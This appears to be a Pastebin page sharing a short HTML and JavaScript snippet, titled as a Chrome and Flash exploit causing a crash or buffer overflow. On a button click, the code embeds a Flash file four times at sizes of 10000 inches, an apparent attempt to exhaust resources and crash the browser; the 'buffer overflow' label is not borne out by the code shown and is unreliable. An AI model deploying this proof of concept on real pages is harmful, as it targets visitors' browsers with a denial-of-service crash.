Advertisement
BrU32

JS/Chrome & Flash Exploit Crash/Buffer Overflow Final Rev

Sep 23rd, 2016
287
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.27 KB | None | 0 0
  1. <button onclick="testFunc()">Load</button><p>
  2. <script>
  3. function testFunc() {
  4. var out= 4;
  5. for(var i=0;i<out;i++){
  6. var x =document.createElement("EMBED");
  7. x.src= "textt.swf";
  8. x.height= ("10000in");
  9. x.width=("10000in");
  10. document.body.appendChild(x);
  11. }
  12. }
  13. </script>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement